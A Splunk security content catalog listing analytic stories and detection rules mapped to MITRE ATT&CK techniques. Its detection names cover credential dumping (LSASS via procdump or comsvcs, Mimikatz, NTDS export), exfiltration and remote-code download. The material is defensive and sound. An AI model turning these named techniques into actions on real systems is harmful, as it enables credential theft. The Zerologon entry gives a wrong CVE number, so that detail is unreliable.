Splunk® Security Content

Analytic Stories


Splunk Security Content Analytic Story


All the Analytic Stories shipped with the different Splunk products, broken down by category below.

Abuse

Brand monitoring

Detect and investigate activity that may indicate that an adversary is using faux domains to mislead users into interacting with malicious infrastructure. Monitor DNS, email, and web traffic for permutations of your brand name.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Email, Web
  • Last Updated: 2017-12-19
  • Use Case: Advanced Threat Detection

DNS amplification attacks

A DNS server poses a serious threat as a Denial of Service (DoS) amplifier if it responds to `ANY` queries. This Analytic Story can help you detect attackers who may be abusing your company's DNS infrastructure to launch amplification attacks that cause Denial of Service for other victims.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Network_Resolution
  • Last Updated: 2016-09-13
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
Large Volume of DNS ANY Queries | T1498.002 | Reflection Amplification | Impact | Anomaly

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Data protection

Fortify your data-protection arsenal, while continuing to ensure data confidentiality and integrity, with searches that monitor for and help you investigate possible signs of data exfiltration.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Network_Resolution
  • Last Updated: 2017-09-14
  • Use Case: Security Monitoring

Netsh abuse

Detect activities and various techniques associated with the abuse of `netsh.exe`, which can disable local firewall settings or set up a remote connection to a host from an infected system.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2017-01-05
  • Use Case: Advanced Threat Detection


Adversary Tactics

Active directory discovery

Monitor for activities and techniques associated with Discovery and Reconnaissance within Active Directory environments.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-08-20
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
AdsiSearcher Account Discovery | T1087.002, T1482, T1018, T1069.002, T1201, T1069.001, T1033, T1087.001, T1049 | Domain Account, Domain Trust Discovery, Remote System Discovery, Domain Groups, Password Policy Discovery, Local Groups, System Owner/User Discovery, Local Account, System Network Connections Discovery | Discovery, Discovery, Discovery, Discovery, Discovery, Discovery, Discovery, Discovery, Discovery | TTP
DSQuery Domain Discovery | T1482, T1018 | Domain Trust Discovery, Remote System Discovery | Discovery, Discovery | TTP
Domain Account Discovery With Net App | T1087.002 | Domain Account | Discovery | TTP
Domain Account Discovery with Dsquery | T1087.002 | Domain Account | Discovery | Hunting
Domain Account Discovery with Wmic | T1087.002 | Domain Account | Discovery | TTP
Domain Controller Discovery with Nltest | T1018 | Remote System Discovery | Discovery | TTP
Domain Controller Discovery with Wmic | T1018 | Remote System Discovery | Discovery | Hunting
Domain Group Discovery With Dsquery | T1069.002 | Domain Groups | Discovery | Hunting
Domain Group Discovery With Net | T1069.002 | Domain Groups | Discovery | Hunting
Domain Group Discovery With Wmic | T1069.002 | Domain Groups | Discovery | Hunting
Domain Group Discovery with Adsisearcher | T1069.002 | Domain Groups | Discovery | TTP
Elevated Group Discovery With Net | T1069.002 | Domain Groups | Discovery | TTP
Elevated Group Discovery With Wmic | T1069.002 | Domain Groups | Discovery | TTP
Elevated Group Discovery with PowerView | T1069.002 | Domain Groups | Discovery | Hunting
Get ADDefaultDomainPasswordPolicy with Powershell | T1201 | Password Policy Discovery | Discovery | Hunting
Get ADDefaultDomainPasswordPolicy with Powershell Script Block | T1201 | Password Policy Discovery | Discovery | Hunting
Get ADUser with PowerShell | T1087.002 | Domain Account | Discovery | Hunting
Get ADUser with PowerShell Script Block | T1087.002 | Domain Account | Discovery | Hunting
Get ADUserResultantPasswordPolicy with Powershell | T1201 | Password Policy Discovery | Discovery | TTP
Get ADUserResultantPasswordPolicy with Powershell Script Block | T1201 | Password Policy Discovery | Discovery | TTP
Get DomainPolicy with Powershell | T1201 | Password Policy Discovery | Discovery | TTP
Get DomainPolicy with Powershell Script Block | T1201 | Password Policy Discovery | Discovery | TTP
Get DomainUser with PowerShell | T1087.002 | Domain Account | Discovery | TTP
Get DomainUser with PowerShell Script Block | T1087.002 | Domain Account | Discovery | TTP
Get WMIObject Group Discovery | T1069.001 | Local Groups | Discovery | Hunting
Get WMIObject Group Discovery with Script Block Logging | T1069.001 | Local Groups | Discovery | Hunting
Get-DomainTrust with PowerShell | T1482 | Domain Trust Discovery | Discovery | TTP
Get-DomainTrust with PowerShell Script Block | T1482 | Domain Trust Discovery | Discovery | TTP
Get-ForestTrust with PowerShell | T1482 | Domain Trust Discovery | Discovery | TTP
Get-ForestTrust with PowerShell Script Block | T1482 | Domain Trust Discovery | Discovery | TTP
GetAdComputer with PowerShell | T1018 | Remote System Discovery | Discovery | Hunting
GetAdComputer with PowerShell Script Block | T1018 | Remote System Discovery | Discovery | Hunting
GetAdGroup with PowerShell | T1069.002 | Domain Groups | Discovery | Hunting
GetAdGroup with PowerShell Script Block | T1069.002 | Domain Groups | Discovery | Hunting
GetCurrent User with PowerShell | T1033 | System Owner/User Discovery | Discovery | Hunting
GetCurrent User with PowerShell Script Block | T1033 | System Owner/User Discovery | Discovery | Hunting
GetDomainComputer with PowerShell | T1018 | Remote System Discovery | Discovery | TTP
GetDomainComputer with PowerShell Script Block | T1018 | Remote System Discovery | Discovery | TTP
GetDomainController with PowerShell | T1018 | Remote System Discovery | Discovery | Hunting
GetDomainController with PowerShell Script Block | T1018 | Remote System Discovery | Discovery | TTP
GetDomainGroup with PowerShell | T1069.002 | Domain Groups | Discovery | TTP
GetDomainGroup with PowerShell Script Block | T1069.002 | Domain Groups | Discovery | TTP
GetLocalUser with PowerShell | T1087.001 | Local Account | Discovery | Hunting
GetLocalUser with PowerShell Script Block | T1087.001 | Local Account | Discovery | Hunting
GetNetTcpconnection with PowerShell | T1049 | System Network Connections Discovery | Discovery | Hunting
GetNetTcpconnection with PowerShell Script Block | T1049 | System Network Connections Discovery | Discovery | Hunting
GetWmiObject DS User with PowerShell | T1087.002 | Domain Account | Discovery | TTP
GetWmiObject DS User with PowerShell Script Block | T1087.002 | Domain Account | Discovery | TTP
GetWmiObject Ds Computer with PowerShell | T1018 | Remote System Discovery | Discovery | TTP
GetWmiObject Ds Computer with PowerShell Script Block | T1018 | Remote System Discovery | Discovery | TTP
GetWmiObject Ds Group with PowerShell | T1069.002 | Domain Groups | Discovery | TTP
GetWmiObject Ds Group with PowerShell Script Block | T1069.002 | Domain Groups | Discovery | TTP
GetWmiObject User Account with PowerShell | T1087.001 | Local Account | Discovery | Hunting
GetWmiObject User Account with PowerShell Script Block | T1087.001 | Local Account | Discovery | Hunting
Local Account Discovery With Wmic | T1087.001 | Local Account | Discovery | Hunting
Local Account Discovery with Net | T1087.001 | Local Account | Discovery | Hunting
NLTest Domain Trust Discovery | T1482 | Domain Trust Discovery | Discovery | TTP
Net Localgroup Discovery | T1069.001 | Local Groups | Discovery | Hunting
Network Connection Discovery With Arp | T1049 | System Network Connections Discovery | Discovery | Hunting
Network Connection Discovery With Net | T1049 | System Network Connections Discovery | Discovery | Hunting
Network Connection Discovery With Netstat | T1049 | System Network Connections Discovery | Discovery | Hunting
Password Policy Discovery with Net | T1201 | Password Policy Discovery | Discovery | Hunting
PowerShell Get LocalGroup Discovery | T1069.001 | Local Groups | Discovery | Hunting
Powershell Get LocalGroup Discovery with Script Block Logging | T1069.001 | Local Groups | Discovery | Hunting
Remote System Discovery with Adsisearcher | T1018 | Remote System Discovery | Discovery | TTP
Remote System Discovery with Dsquery | T1018 | Remote System Discovery | Discovery | Hunting
Remote System Discovery with Net | T1018 | Remote System Discovery | Discovery | Hunting
Remote System Discovery with Wmic | T1018 | Remote System Discovery | Discovery | TTP
System User Discovery With Query | T1033 | System Owner/User Discovery | Discovery | Hunting
System User Discovery With Whoami | T1033 | System Owner/User Discovery | Discovery | Hunting
User Discovery With Env Vars PowerShell | T1033 | System Owner/User Discovery | Discovery | Hunting
User Discovery With Env Vars PowerShell Script Block | T1033 | System Owner/User Discovery | Discovery | Hunting
Wmic Group Discovery | T1069.001 | Local Groups | Discovery | Hunting

Kill Chain Phase

  • Exploitation
  • Reconnaissance


Reference


version: 1


Active directory password spraying

Monitor for activities and techniques associated with Password Spraying attacks within Active Directory environments.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-04-07
  • Use Case: Advanced Threat Detection

BITS jobs

Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-03-26
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
BITS Job Persistence | T1197, T1105 | BITS Jobs, Ingress Tool Transfer | Defense Evasion, Persistence, Command And Control | TTP
BITSAdmin Download File | T1197, T1105 | BITS Jobs, Ingress Tool Transfer | Defense Evasion, Persistence, Command And Control | TTP
PowerShell Start-BitsTransfer | T1197 | BITS Jobs | Defense Evasion, Persistence | TTP

Kill Chain Phase

  • Exploitation


Reference


version: 1


Baron Samedit CVE-2021-3156

Uncover activity consistent with CVE-2021-3156. Discovered by the Qualys Research Team, this vulnerability affects sudo across multiple Linux distributions (Ubuntu 20.04 and prior, Debian 10 and prior, Fedora 33 and prior). Because the vulnerable code was committed in July 2011, many distributions are affected. Successful exploitation of this vulnerability allows any unprivileged user to gain root privileges on the vulnerable host.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2021-01-27
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
Detect Baron Samedit CVE-2021-3156 | T1068 | Exploitation for Privilege Escalation | Privilege Escalation | TTP
Detect Baron Samedit CVE-2021-3156 Segfault | T1068 | Exploitation for Privilege Escalation | Privilege Escalation | TTP
Detect Baron Samedit CVE-2021-3156 via OSQuery | T1068 | Exploitation for Privilege Escalation | Privilege Escalation | TTP

Kill Chain Phase

  • Exploitation


Reference


version: 1


Cobalt strike

Cobalt Strike is threat emulation software. Red teams and penetration testers use Cobalt Strike to demonstrate the risk of a breach and to evaluate mature security programs. More recently, Cobalt Strike has become the tool of choice for threat groups because of its ease of use and extensibility.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-02-16
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
Anomalous usage of 7zip | T1560.001, T1059.003, T1543.003, T1055, T1071.002, T1218.010, T1218.005, T1569.002, T1027, T1218.011, T1053.005, T1548, T1203, T1505.003, T1127.001, T1036.003, T1127, T1071.001, T1018 | Archive via Utility, Windows Command Shell, Windows Service, Process Injection, File Transfer Protocols, Regsvr32, Mshta, Service Execution, Obfuscated Files or Information, Rundll32, Scheduled Task, Abuse Elevation Control Mechanism, Exploitation for Client Execution, Web Shell, MSBuild, Rename System Utilities, Trusted Developer Utilities Proxy Execution, Web Protocols, Remote System Discovery | Collection, Execution, Persistence, Privilege Escalation, Defense Evasion, Privilege Escalation, Command And Control, Defense Evasion, Defense Evasion, Execution, Defense Evasion, Defense Evasion, Execution, Persistence, Privilege Escalation, Privilege Escalation, Defense Evasion, Execution, Persistence, Defense Evasion, Defense Evasion, Defense Evasion, Command And Control, Discovery | Anomaly
CMD Echo Pipe - Escalation | T1059.003, T1543.003 | Windows Command Shell, Windows Service | Execution, Persistence, Privilege Escalation | TTP
Cobalt Strike Named Pipes | T1055 | Process Injection | Defense Evasion, Privilege Escalation | TTP
DLLHost with no Command Line Arguments with Network | T1055 | Process Injection | Defense Evasion, Privilege Escalation | TTP
Detect Regsvr32 Application Control Bypass | T1218.010 | Regsvr32 | Defense Evasion | TTP
GPUpdate with no Command Line Arguments with Network | T1055 | Process Injection | Defense Evasion, Privilege Escalation | TTP
Rundll32 with no Command Line Arguments with Network | T1218.011 | Rundll32 | Defense Evasion | TTP
SearchProtocolHost with no Command Line with Network | T1055 | Process Injection | Defense Evasion, Privilege Escalation | TTP
Services Escalate Exe | T1548 | Abuse Elevation Control Mechanism | Privilege Escalation, Defense Evasion | TTP
Suspicious DLLHost no Command Line Arguments | T1055 | Process Injection | Defense Evasion, Privilege Escalation | TTP
Suspicious GPUpdate no Command Line Arguments | T1055 | Process Injection | Defense Evasion, Privilege Escalation | TTP
Suspicious MSBuild Rename | T1127.001, T1036.003 | MSBuild, Rename System Utilities | Defense Evasion, Defense Evasion | TTP
Suspicious Rundll32 StartW | T1218.011 | Rundll32 | Defense Evasion | TTP
Suspicious Rundll32 no Command Line Arguments | T1218.011 | Rundll32 | Defense Evasion | TTP
Suspicious SearchProtocolHost no Command Line Arguments | T1055 | Process Injection | Defense Evasion, Privilege Escalation | TTP
Suspicious microsoft workflow compiler rename | T1127, T1036.003 | Trusted Developer Utilities Proxy Execution, Rename System Utilities | Defense Evasion, Defense Evasion | Hunting
Suspicious msbuild path | T1127.001, T1036.003 | MSBuild, Rename System Utilities | Defense Evasion, Defense Evasion | TTP

Kill Chain Phase

  • Actions on Objective
  • Actions on Objectives
  • Exploitation
  • Privilege Escalation


Reference


version: 1


Collection and staging

Monitor for and investigate activities, such as suspicious writes to the Windows Recycle Bin or email servers sending high volumes of traffic to specific hosts, that may indicate that an adversary is harvesting and exfiltrating sensitive data.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint, Network_Traffic
  • Last Updated: 2020-02-03
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
Detect Renamed 7-Zip | T1560.001, T1114.001, T1114.002, T1036 | Archive via Utility, Local Email Collection, Remote Email Collection, Masquerading | Collection, Collection, Collection, Defense Evasion | Hunting
Detect Renamed WinRAR | T1560.001 | Archive via Utility | Collection | Hunting
Email files written outside of the Outlook directory | T1114.001 | Local Email Collection | Collection | TTP
Email servers sending high volume traffic to hosts | T1114.002 | Remote Email Collection | Collection | Anomaly
Hosts receiving high volume of network traffic from email server | T1114.002 | Remote Email Collection | Collection | Anomaly
Suspicious writes to windows Recycle Bin | T1036 | Masquerading | Defense Evasion | TTP

Kill Chain Phase

  • Actions on Objectives
  • Exfiltration
  • Exploitation


Reference


version: 1


Command and control

Detect and investigate tactics, techniques, and procedures leveraged by attackers to establish and operate command and control channels. Implants installed by attackers on compromised endpoints use these channels to receive instructions and send data back to the malicious operators.

Detection Profile

Name | ID | Technique | Tactic | Type
DNS Exfiltration Using Nslookup App | T1048, T1071.004, T1048.003, T1095, T1041, T1189, T1537, T1114.001, T1114, T1114.003, T1071.001 | Exfiltration Over Alternative Protocol, DNS, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Non-Application Layer Protocol, Exfiltration Over C2 Channel, Drive-by Compromise, Transfer Data to Cloud Account, Local Email Collection, Email Collection, Email Forwarding Rule, Web Protocols | Exfiltration, Command And Control, Exfiltration, Command And Control, Exfiltration, Initial Access, Exfiltration, Collection, Collection, Collection, Command And Control | TTP
DNS Query Length Outliers - MLTK | T1071.004 | DNS | Command And Control | Anomaly
DNS Query Length With High Standard Deviation | T1048.003 | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | Exfiltration | Anomaly
Detect Large Outbound ICMP Packets | T1095 | Non-Application Layer Protocol | Command And Control | TTP
Detect Spike in blocked Outbound Traffic from your AWS | | | | Anomaly
Detect hosts connecting to dynamic domain providers | T1189 | Drive-by Compromise | Initial Access | TTP
Excessive DNS Failures | T1071.004 | DNS | Command And Control | Anomaly
Excessive Usage of NSLOOKUP App | T1048 | Exfiltration Over Alternative Protocol | Exfiltration | Anomaly
Multiple Archive Files Http Post Traffic | T1048.003 | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | Exfiltration | TTP
Plain HTTP POST Exfiltrated Data | T1048.003 | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | Exfiltration | TTP
Prohibited Network Traffic Allowed | T1048 | Exfiltration Over Alternative Protocol | Exfiltration | TTP
Protocol or Port Mismatch | T1048.003 | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | Exfiltration | Anomaly
TOR Traffic | T1071.001 | Web Protocols | Command And Control | TTP

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Delivery
  • Exfiltration
  • Exploitation


Reference


version: 1


Credential dumping

Uncover activity consistent with credential dumping, a technique wherein attackers compromise systems and attempt to obtain and exfiltrate passwords. The threat actors use these pilfered credentials to further escalate privileges and spread throughout a target environment. The searches included in this Analytic Story are designed to identify credential dumping attempts.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2020-02-04
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
Access LSASS Memory for Dump Creation | T1003.001, T1055, T1068, T1078, T1098, T1134, T1543, T1547, T1548, T1554, T1556, T1558, T1555, T1087, T1201, T1552, T1003, T1003.002, T1003.003, T1558.003, T1059.001 | LSASS Memory, Process Injection, Exploitation for Privilege Escalation, Valid Accounts, Account Manipulation, Access Token Manipulation, Create or Modify System Process, Boot or Logon Autostart Execution, Abuse Elevation Control Mechanism, Compromise Client Software Binary, Modify Authentication Process, Steal or Forge Kerberos Tickets, Credentials from Password Stores, Account Discovery, Password Policy Discovery, Unsecured Credentials, OS Credential Dumping, Security Account Manager, NTDS, Kerberoasting, PowerShell | Credential Access, Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence, Defense Evasion, Privilege Escalation, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Privilege Escalation, Defense Evasion, Persistence, Credential Access, Defense Evasion, Persistence, Credential Access, Credential Access, Discovery, Discovery, Credential Access, Credential Access, Credential Access, Credential Access, Credential Access, Execution | TTP
Applying Stolen Credentials via Mimikatz modules | T1055, T1068, T1078, T1098, T1134, T1543, T1547, T1548, T1554, T1556, T1558 | Process Injection, Exploitation for Privilege Escalation, Valid Accounts, Account Manipulation, Access Token Manipulation, Create or Modify System Process, Boot or Logon Autostart Execution, Abuse Elevation Control Mechanism, Compromise Client Software Binary, Modify Authentication Process, Steal or Forge Kerberos Tickets | Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence, Defense Evasion, Privilege Escalation, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Privilege Escalation, Defense Evasion, Persistence, Credential Access, Defense Evasion, Persistence, Credential Access | TTP
Applying Stolen Credentials via PowerSploit modules | T1055, T1068, T1078, T1098, T1134, T1543, T1547, T1548, T1554, T1555, T1558 | Process Injection, Exploitation for Privilege Escalation, Valid Accounts, Account Manipulation, Access Token Manipulation, Create or Modify System Process, Boot or Logon Autostart Execution, Abuse Elevation Control Mechanism, Compromise Client Software Binary, Credentials from Password Stores, Steal or Forge Kerberos Tickets | Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence, Defense Evasion, Privilege Escalation, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Privilege Escalation, Defense Evasion, Persistence, Credential Access, Credential Access | TTP
Assessment of Credential Strength via DSInternals modules | T1078, T1098, T1087, T1201, T1552, T1555 | Valid Accounts, Account Manipulation, Account Discovery, Password Policy Discovery, Unsecured Credentials, Credentials from Password Stores | Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence, Discovery, Discovery, Credential Access, Credential Access | TTP
Attempted Credential Dump From Registry via Reg exe | T1003 | OS Credential Dumping | Credential Access | TTP
Attempted Credential Dump From Registry via Reg exe | T1003.002, T1197, T1105, T1218.003, T1055, T1490, T1003.001, T1021.002, T1020, T1569.002, T1486, T1548.002 | Security Account Manager, BITS Jobs, Ingress Tool Transfer, CMSTP, Process Injection, Inhibit System Recovery, LSASS Memory, SMB/Windows Admin Shares, Automated Exfiltration, Service Execution, Data Encrypted for Impact, Bypass User Account Control | Credential Access, Defense Evasion, Persistence, Command And Control, Defense Evasion, Defense Evasion, Privilege Escalation, Impact, Credential Access, Lateral Movement, Exfiltration, Execution, Impact, Privilege Escalation, Defense Evasion | TTP
Create Remote Thread into LSASS | T1003.001 | LSASS Memory | Credential Access | TTP
Creation of Shadow Copy | T1003.003 | NTDS | Credential Access | TTP
Creation of Shadow Copy with wmic and powershell | T1003.003 | NTDS | Credential Access | TTP
Creation of lsass Dump with Taskmgr | T1003.001 | LSASS Memory | Credential Access | TTP
Credential Dumping via Copy Command from Shadow Copy | T1003.003 | NTDS | Credential Access | TTP
Credential Dumping via Symlink to Shadow Copy | T1003.003 | NTDS | Credential Access | TTP
Credential Extraction indicative of FGDump and CacheDump with s option | T1003 | OS Credential Dumping | Credential Access | TTP
Credential Extraction indicative of FGDump and CacheDump with v option | T1003 | OS Credential Dumping | Credential Access | TTP
Credential Extraction indicative of Lazagne command line options | T1003, T1555 | OS Credential Dumping, Credentials from Password Stores | Credential Access, Credential Access | TTP
Credential Extraction indicative of use of DSInternals credential conversion modules | T1003 | OS Credential Dumping | Credential Access | TTP
Credential Extraction indicative of use of DSInternals modules | T1003 | OS Credential Dumping | Credential Access | TTP
Credential Extraction indicative of use of Mimikatz modules | T1003 | OS Credential Dumping | Credential Access | TTP
Credential Extraction indicative of use of PowerSploit modules | T1003 | OS Credential Dumping | Credential Access | TTP
Credential Extraction native Microsoft debuggers peek into the kernel | T1003 | OS Credential Dumping | Credential Access | TTP
Credential Extraction native Microsoft debuggers via z command line option | T1003 | OS Credential Dumping | Credential Access | TTP
Credential Extraction via Get-ADDBAccount module present in PowerSploit and DSInternals | T1003 | OS Credential Dumping | Credential Access | TTP
Detect Copy of ShadowCopy with Script Block Logging | T1003.002 | Security Account Manager | Credential Access | TTP
Detect Credential Dumping through LSASS access | T1003.001 | LSASS Memory | Credential Access | TTP
Detect Dump LSASS Memory using comsvcs | T1003.003 | NTDS | Credential Access | TTP
Detect Kerberoasting | T1558.003 | Kerberoasting | Credential Access | TTP
Detect Mimikatz Using Loaded Images | T1003.001 | LSASS Memory | Credential Access | TTP
Dump LSASS via comsvcs DLL | T1003.001 | LSASS Memory | Credential Access | TTP
Dump LSASS via procdump | T1003.001 | LSASS Memory | Credential Access | TTP
Esentutl SAM Copy | T1003.002 | Security Account Manager | Credential Access | Hunting
Extraction of Registry Hives | T1003.002 | Security Account Manager | Credential Access | TTP
Ntdsutil Export NTDS | T1003.003 | NTDS | Credential Access | TTP
SAM Database File Access Attempt | T1003.002 | Security Account Manager | Credential Access | Hunting
SecretDumps Offline NTDS Dumping Tool | T1003.003 | NTDS | Credential Access | TTP
Set Default PowerShell Execution Policy To Unrestricted or Bypass | T1059.001 | PowerShell | Execution | TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation
  • Installation
  • Lateral Movement
  • Privilege Escalation


Reference


version: 3


DNS hijacking

Secure your environment against DNS hijacks with searches that help you detect and investigate unauthorized changes to DNS records.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Network_Resolution
  • Last Updated: 2020-02-04
  • Use Case: Advanced Threat Detection

Data exfiltration

The stealing of data by an adversary.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint, Network_Traffic
  • Last Updated: 2020-10-21
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
DNS Exfiltration Using Nslookup App | T1048, T1071.004, T1048.003, T1095, T1041, T1189, T1537, T1114.001, T1114, T1114.003, T1071.001 | Exfiltration Over Alternative Protocol, DNS, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Non-Application Layer Protocol, Exfiltration Over C2 Channel, Drive-by Compromise, Transfer Data to Cloud Account, Local Email Collection, Email Collection, Email Forwarding Rule, Web Protocols | Exfiltration, Command And Control, Exfiltration, Command And Control, Exfiltration, Initial Access, Exfiltration, Collection, Collection, Collection, Command And Control | TTP
Detect SNICat SNI Exfiltration | T1041 | Exfiltration Over C2 Channel | Exfiltration | TTP
Detect shared ec2 snapshot | T1537 | Transfer Data to Cloud Account | Exfiltration | TTP
Excessive Usage of NSLOOKUP App | T1048 | Exfiltration Over Alternative Protocol | Exfiltration | Anomaly
Mailsniper Invoke functions | T1114.001 | Local Email Collection | Collection | TTP
Multiple Archive Files Http Post Traffic | T1048.003 | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | Exfiltration | TTP
O365 PST export alert | T1114 | Email Collection | Collection | TTP
O365 Suspicious Admin Email Forwarding | T1114.003 | Email Forwarding Rule | Collection | Anomaly
O365 Suspicious User Email Forwarding | T1114.003 | Email Forwarding Rule | Collection | Anomaly
Plain HTTP POST Exfiltrated Data | T1048.003 | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | Exfiltration | TTP

Kill Chain Phase

  • Actions on Objective
  • Actions on Objectives
  • Exfiltration
  • Exploitation


Reference


version: 1


Deobfuscate-decode files or information

Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-03-24
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
CertUtil With Decode Argument | T1140 | Deobfuscate/Decode Files or Information | Defense Evasion | TTP

Kill Chain Phase

  • Exploitation


Reference


version: 1


Detect zerologon attack

Uncover activity related to the execution of Zerologon CVE-2020-11472, a technique wherein attackers target a Microsoft Windows Domain Controller to reset its computer account password. As a result, attackers can grant themselves high privileges and take over the Domain Controller. The searches included in this Analytic Story are designed to identify attempts to reset the Domain Controller computer account, either remotely via exploit code or via the use of Mimikatz as a payload carrier.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-09-18
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
Detect Computer Changed with Anonymous Account | T1210, T1003.001, T1190 | Exploitation of Remote Services, LSASS Memory, Exploit Public-Facing Application | Lateral Movement, Credential Access, Initial Access | Hunting
Detect Credential Dumping through LSASS access | T1003.001 | LSASS Memory | Credential Access | TTP
Detect Mimikatz Using Loaded Images | T1003.001 | LSASS Memory | Credential Access | TTP
Detect Zerologon via Zeek | T1190 | Exploit Public-Facing Application | Initial Access | TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 1


Disabling security tools

Look for activities and techniques associated with the disabling of security tools on a Windows system, such as suspicious `reg.exe` processes, processes launching netsh, and many others.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2020-02-04
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
Attempt To Add Certificate To Untrusted Store | T1553.004, T1562.001, T1562.004, T1543.003, T1112 | Install Root Certificate, Disable or Modify Tools, Disable or Modify System Firewall, Windows Service, Modify Registry | Defense Evasion, Defense Evasion, Defense Evasion, Persistence, Privilege Escalation, Defense Evasion | TTP
Attempt To Stop Security Service | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Processes launching netsh | T1562.004 | Disable or Modify System Firewall | Defense Evasion | TTP
Sc exe Manipulating Windows Services | T1543.003 | Windows Service | Persistence, Privilege Escalation | TTP
Suspicious Reg exe Process | T1112 | Modify Registry | Defense Evasion | TTP
Unload Sysmon Filter Driver | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP

Kill Chain Phase

  • Actions on Objectives
  • Installation


Reference


version: 2


Domain trust discovery

Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-03-25
  • Use Case: Advanced Threat Detection

Detection Profile

| Name | ID | Technique | Tactic | Type |
| --- | --- | --- | --- | --- |
| DSQuery Domain Discovery | T1482, T1018 | Domain Trust Discovery, Remote System Discovery | Discovery, Discovery | TTP |
| NLTest Domain Trust Discovery | T1482 | Domain Trust Discovery | Discovery | TTP |
| Windows AdFind Exe | T1018 | Remote System Discovery | Discovery | TTP |

Kill Chain Phase

  • Exploitation


Reference


version: 1


F5 tmui rce cve-2020-5902

Uncover activity consistent with CVE-2020-5902. Discovered by Positive Technologies researchers, this vulnerability affects F5 BIG-IP, BIG-IQ, and Traffix SDC devices (vulnerable versions in the F5 support link below). It allows unauthenticated users, as well as authenticated users with access to the configuration utility, to execute system commands, create or delete files, disable services, and/or execute Java code. Exploitation can result in full system compromise.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-08-02
  • Use Case: Advanced Threat Detection

Hafnium group

HAFNIUM group was identified by Microsoft as exploiting 4 Microsoft Exchange CVEs in the wild - CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint, Network_Traffic
  • Last Updated: 2021-03-03
  • Use Case: Advanced Threat Detection

Detection Profile

| Name | ID | Technique | Tactic | Type |
| --- | --- | --- | --- | --- |
| Any Powershell DownloadString | T1059.001, T1505.003, T1136.001, T1021.002, T1569.002, T1003.001, T1114.002, T1003.003, T1190 | PowerShell, Web Shell, Local Account, SMB/Windows Admin Shares, Service Execution, LSASS Memory, Remote Email Collection, NTDS, Exploit Public-Facing Application | Execution, Persistence, Persistence, Lateral Movement, Execution, Credential Access, Collection, Credential Access, Initial Access | TTP |
